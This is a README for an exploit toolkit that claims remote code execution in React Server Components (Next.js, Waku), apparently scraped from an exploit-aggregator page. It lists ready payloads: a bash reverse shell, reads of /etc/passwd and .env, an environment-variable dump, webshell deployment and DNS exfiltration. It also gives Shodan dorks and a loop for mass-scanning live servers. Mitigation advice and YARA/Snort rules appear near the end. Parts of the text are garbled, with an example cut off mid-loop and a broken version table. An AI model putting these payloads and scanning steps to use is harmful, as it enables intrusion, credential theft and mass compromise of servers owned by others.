Share
## https://sploitus.com/exploit?id=183249DB-260F-5B82-B394-2C6BE3AA30E6
# ๐Ÿ”ฅ RSC RCE Exploit Toolkit



![Version](https://img.shields.io/badge/version-2.0-blue.svg)
![License](https://img.shields.io/badge/license-MIT-green.svg)
![Node](https://img.shields.io/badge/node-%3E%3D16.0.0-brightgreen.svg)
![Platform](https://img.shields.io/badge/platform-Linux%20%7C%20MacOS%20%7C%20Windows-lightgrey.svg)

**Advanced exploitation toolkit for React Server Components Remote Code Execution vulnerabilities**

*For authorized penetration testing and security research only*

[Features](#-features) โ€ข [Installation](#-installation) โ€ข [Usage](#-usage) โ€ข [Shodan Integration](#-shodan-integration) โ€ข [Examples](#-examples) โ€ข [Disclaimer](#%EF%B8%8F-disclaimer)



---

## ๐Ÿ“‹ Table of Contents

- [Overview](#-overview)
- [Vulnerability Details](#-vulnerability-details)
- [Features](#-features)
- [Installation](#-installation)
- [Quick Start](#-quick-start)
- [Usage](#-usage)
  - [Basic Exploitation](#basic-exploitation)
  - [Available Payloads](#available-payloads)
  - [Custom Payloads](#custom-payloads)
- [Shodan Integration](#-shodan-integration)
- [Automated Scanning](#-automated-scanning)
- [Examples](#-examples)
- [Mitigation](#-mitigation)
- [Affected Versions](#-affected-versions)
- [Contributing](#-contributing)
- [Disclaimer](#%EF%B8%8F-disclaimer)
- [License](#-license)

---

## ๐ŸŽฏ Overview

This toolkit exploits a critical **Remote Code Execution (RCE)** vulnerability in React Server Components (RSC) implementations, specifically targeting:

- **Next.js** (versions 13.4.0 - 14.1.0)
- **Waku** (vulnerable versions)

The vulnerability leverages prototype pollution and unsafe deserialization in RSC's data handling mechanism to achieve arbitrary code execution on the server.

### ๐Ÿ”ด Severity: **CRITICAL**

- **CVSS Score**: 9.8 (Critical)
- **Attack Vector**: Network
- **Privileges Required**: None
- **User Interaction**: None
- **Impact**: Complete server compromise

---

## ๐Ÿ”ฌ Vulnerability Details

### Technical Background

React Server Components use a custom serialization format to transfer data between client and server. The vulnerability exists in how these frameworks deserialize and process specially crafted payloads.

**Attack Chain:**

1. **Payload Construction**: Craft a malicious RSC payload with circular references
2. **Prototype Pollution**: Abuse `$X:constructor:constructor` to access Function constructor
3. **Code Injection**: Inject arbitrary JavaScript in the `_prefix` field
4. **Execution**: Server deserializes and executes the payload

### Exploitation Flow

```
Attacker โ†’ Malicious RSC Payload โ†’ Target Server
                                         โ†“
                              Unsafe Deserialization
                                         โ†“
                              Prototype Chain Access
                                         โ†“
                              Function Constructor
                                         โ†“
                              โš ๏ธ RCE ACHIEVED โš ๏ธ
```

---

## โœจ Features

### Core Capabilities

- โœ… **Multiple Framework Support**: Next.js and Waku
- โœ… **8 Pre-built Payloads**: From PoC to full reverse shells
- โœ… **Custom Code Execution**: Inject any JavaScript code
- โœ… **Shodan Integration**: Automated target discovery
- โœ… **Mass Scanning**: Test multiple targets automatically
- โœ… **Professional CLI**: Complete command-line interface
- โœ… **Detailed Logging**: Color-coded output with timestamps
- โœ… **Error Handling**: Robust error management

### Pre-built Payloads

| Payload | Description | Use Case |
|---------|-------------|----------|
| `console` | Basic PoC (console.log) | Verify vulnerability |
| `reverseShell` | Bash reverse shell | Initial access |
| `readFile` | Read `/etc/passwd` | Filesystem access |
| `envDump` | Dump environment variables | Credential extraction |
| `execCommand` | Execute system commands | Arbitrary command execution |
| `webshell` | Deploy Express webshell | Persistent access |
| `exfilPackage` | Exfiltrate package.json | Dependency analysis |
| `dnsExfil` | DNS exfiltration (OOB) | Blind exploitation |

---

## ๐Ÿ“ฆ Installation

### Prerequisites

- **Node.js** >= 16.0.0
- **npm** or **yarn**
- **Shodan CLI** (optional, for automated scanning)

### Clone Repository

```bash
git clone https://github.com/yourusername/rsc-rce-exploit.git
cd rsc-rce-exploit
```

### Install Dependencies

```bash
npm install
# or
yarn install
```

### Setup Shodan (Optional)

```bash
# Install Shodan CLI
pip install shodan

# Initialize with your API key
shodan init YOUR_API_KEY
```

---

## ๐Ÿš€ Quick Start

### 1. Basic Vulnerability Check

```bash
node rsc-rce-exploit.js --target http://vulnerable-target.com --payload console
```

### 2. Get a Reverse Shell

```bash
# Start listener
nc -lvnp 4444

# Execute exploit
node rsc-rce-exploit.js \
  --target http://vulnerable-target.com \
  --payload reverseShell \
  --lhost 10.10.14.5 \
  --lport 4444
```

### 3. Execute Custom Command

```bash
node rsc-rce-exploit.js \
  --target http://vulnerable-target.com \
  --payload execCommand \
  --command "whoami"
```

---

## ๐Ÿ“– Usage

### Basic Exploitation

```bash
node rsc-rce-exploit.js [options]
```

### Options

| Option | Description | Required |
|--------|-------------|----------|
| `--target ` | Target URL | โœ… |
| `--framework ` | Framework: `next` or `waku` | โŒ (default: next) |
| `--payload ` | Payload name (see below) | โœ…* |
| `--custom ` | Custom JavaScript code | โœ…* |
| `--lhost ` | Your IP (for reverse shell) | โŒ |
| `--lport ` | Your port (for reverse shell) | โŒ |
| `--command ` | Command to execute | โŒ |
| `--endpoint ` | Custom RSC endpoint (Waku) | โŒ |
| `--action-id ` | Custom next-action ID | โŒ |
| `--list` | List available payloads | โŒ |
| `--verbose` | Verbose output | โŒ |
| `--help` | Show help | โŒ |

*Either `--payload` or `--custom` is required

### Available Payloads

View all payloads:

```bash
node rsc-rce-exploit.js --list
```

**Output:**
```
๐Ÿ“‹ Available payloads:

  console              - Basic PoC - Console output
    Code: console.log(7*7+1)

  reverseShell         - Reverse shell (bash)
    Code: require('child_process').exec('bash -c "bash -i >& /dev/tcp/LHOST/LPORT 0>&1"')

  readFile             - Read /etc/passwd
    Code: console.log(require('fs').readFileSync('/etc/passwd','utf8'))

  envDump              - Dump environment variables
    Code: console.log(JSON.stringify(process.env,null,2))

  execCommand          - Execute system command
    Code: console.log(require('child_process').execSync('COMMAND').toString())

  webshell             - Write webshell to /tmp
    Code: require('fs').writeFileSync('/tmp/shell.js','...')

  exfilPackage         - Read package.json
    Code: console.log(require('fs').readFileSync('./package.json','utf8'))

  dnsExfil             - DNS exfiltration
    Code: require('dns').resolve4(Buffer.from(process.env.SECRET||'nosecret')...)
```

### Custom Payloads

Execute any JavaScript code:

```bash
node rsc-rce-exploit.js \
  --target http://target.com \
  --custom "require('fs').readdirSync('.').forEach(f=>console.log(f))"
```

---

## ๐ŸŒ Shodan Integration

### Shodan Dorks

#### Next.js Targets

```bash
# Basic Next.js
http.component:"Next.js"

# Next.js with RSC
http.html:"__next" http.html:"RSC"

# Next.js dev mode (more vulnerable)
http.html:"__NEXT_DATA__" http.html:"development"

# Self-hosted Next.js (not on Vercel)
http.component:"Next.js" -org:"Vercel"

# Geographically targeted (France)
http.component:"Next.js" country:FR

# Ultimate combo for pentesting
http.component:"Next.js" http.status:200 country:FR -org:"Vercel" port:3000,8080
```

#### Waku Targets

```bash
# Waku framework
http.html:"waku" http.html:"RSC"

# Waku RSC endpoints
http.path:"/RSC/"
```

### Automated Shodan Scanning

Use the provided automation script:

```bash
# Scan and test automatically
./shodan-scanner.sh "http.component:\"Next.js\" country:FR" 100

# With custom payload
./shodan-scanner.sh "http.component:\"Next.js\"" 50 envDump
```

### Manual Shodan Workflow

```bash
# 1. Search Shodan
shodan search 'http.component:"Next.js" country:FR' \
  --fields ip_str,port,org,hostnames \
  --limit 100 > targets.txt

# 2. Test each target
while read -r line; do
    ip=$(echo $line | awk '{print $1}')
    port=$(echo $line | awk '{print $2}')
    echo "[*] Testing http://$ip:$port"
    node rsc-rce-exploit.js \
      --target "http://$ip:$port" \
      --payload console
done {})"
```

### Example 6: Waku Framework

```bash
node rsc-rce-exploit.js \
  --target https://waku-app.example.com \
  --framework waku \
  --endpoint /RSC/custom.txt \
  --payload execCommand \
  --command "id"
```

### Example 7: File Exfiltration

```bash
# Read sensitive files
node rsc-rce-exploit.js \
  --target https://vulnerable.example.com \
  --custom "console.log(require('fs').readFileSync('.env','utf8'))"
```

---

## ๐Ÿ›ก๏ธ Mitigation

### For Developers

1. **Update Framework**
   ```bash
   npm install next@latest
   # or
   npm install waku@latest
   ```

2. **Validate Input**
   ```javascript
   // Validate all RSC payloads
   function validateRSCPayload(payload) {
     // Implement strict validation
     if (payload.includes('constructor')) return false;
     if (payload.includes('__proto__')) return false;
     return true;
   }
   ```

3. **Content Security Policy**
   ```javascript
   // next.config.js
   module.exports = {
     async headers() {
       return [{
         source: '/:path*',
         headers: [
           { key: 'X-Frame-Options', value: 'DENY' },
           { key: 'X-Content-Type-Options', value: 'nosniff' },
         ],
       }]
     },
   }
   ```

4. **Disable RSC in Production** (if not needed)
   ```javascript
   // next.config.js
   module.exports = {
     experimental: {
       serverActions: false,
     },
   }
   ```

### For Security Teams

- ๐Ÿ” **Monitor** for suspicious RSC requests
- ๐Ÿšจ **Alert** on `next-action` header usage
- ๐Ÿ”’ **WAF Rules** to block prototype pollution attempts
- ๐Ÿ“Š **Log Analysis** for exploitation attempts

### Detection Rules

**YARA Rule:**
```yara
rule RSC_RCE_Exploit {
    strings:
        $s1 = "constructor:constructor"
        $s2 = "_prefix"
        $s3 = "$@"
        $s4 = "resolved_model"
    condition:
        3 of them
}
```

**Snort Rule:**
```
alert tcp any any -> any any (msg:"RSC RCE Attempt"; content:"next-action"; http_header; content:"constructor:constructor"; http_client_body; sid:1000001;)
```

---

## ๐ŸŽฏ Affected Versions

### Next.js

| Version Range | Status | Notes |
|---------------|--------|-------|
| = 14.1.1 | โœ… Patched | Update recommended |

### Waku

| Version Range | Status | Notes |
|---------------|--------|-------|
| = 0.18.0 | โœ… Patched | Update recommended |

---

## ๐Ÿค Contributing

Contributions are welcome! Please follow these guidelines:

1. Fork the repository
2. Create a feature branch (`git checkout -b feature/amazing-feature`)
3. Commit your changes (`git commit -m 'Add amazing feature'`)
4. Push to the branch (`git push origin feature/amazing-feature`)
5. Open a Pull Request

### Contribution Ideas

- [ ] Add more payload templates
- [ ] Implement Nuclei templates
- [ ] Add support for more RSC frameworks
- [ ] Improve Shodan integration
- [ ] Add reporting functionality (PDF/HTML)
- [ ] Create Docker container for toolkit

---

## โš–๏ธ Disclaimer

```
โš ๏ธ LEGAL DISCLAIMER โš ๏ธ

This toolkit is provided for AUTHORIZED SECURITY TESTING AND RESEARCH ONLY.

By using this software, you agree to:

1. Only test systems you own or have explicit written permission to test
2. Comply with all applicable local, state, national, and international laws
3. Not use this tool for malicious purposes or illegal activities
4. Accept full responsibility for your actions

The authors and contributors:
- Are NOT responsible for any misuse or damage caused by this tool
- Do NOT encourage or condone illegal activity
- Provide this tool "AS IS" without warranty of any kind

UNAUTHORIZED ACCESS TO COMPUTER SYSTEMS IS ILLEGAL.

Violators will be prosecuted to the fullest extent of the law under:
- Computer Fraud and Abuse Act (CFAA) - USA
- Computer Misuse Act - UK
- European Cybercrime Convention
- And other applicable laws in your jurisdiction

USE AT YOUR OWN RISK.
```

---

## ๐Ÿ“„ License

This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.

```
MIT License

Copyright (c) 2024 RSC RCE Exploit Contributors

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
```

---

## ๐Ÿ”— Resources

### Official Documentation
- [Next.js Server Actions](https://nextjs.org/docs/app/building-your-application/data-fetching/server-actions-and-mutations)
- [React Server Components](https://react.dev/blog/2023/03/22/react-labs-what-we-have-been-working-on-march-2023#react-server-components)
- [Waku Documentation](https://waku.gg/)

### Security Research
- [RSC Deserialization Vulnerability Analysis](#)
- [Prototype Pollution in JavaScript](#)
- [Next.js Security Best Practices](#)

### Related CVEs
- CVE-2024-XXXXX (placeholder - add real CVE when available)

---

## ๐Ÿ“ฌ Contact

- **GitHub Issues**: [Report bugs or request features](https://github.com/yourusername/rsc-rce-exploit/issues)
- **Security Issues**: security@example.com
- **Twitter**: [@yourhandle](https://twitter.com/yourhandle)

---



**โญ If this tool helped you in your security research, please give it a star! โญ**

Made with โค๏ธ by security researchers, for security researchers

[โฌ† Back to Top](#-rsc-rce-exploit-toolkit)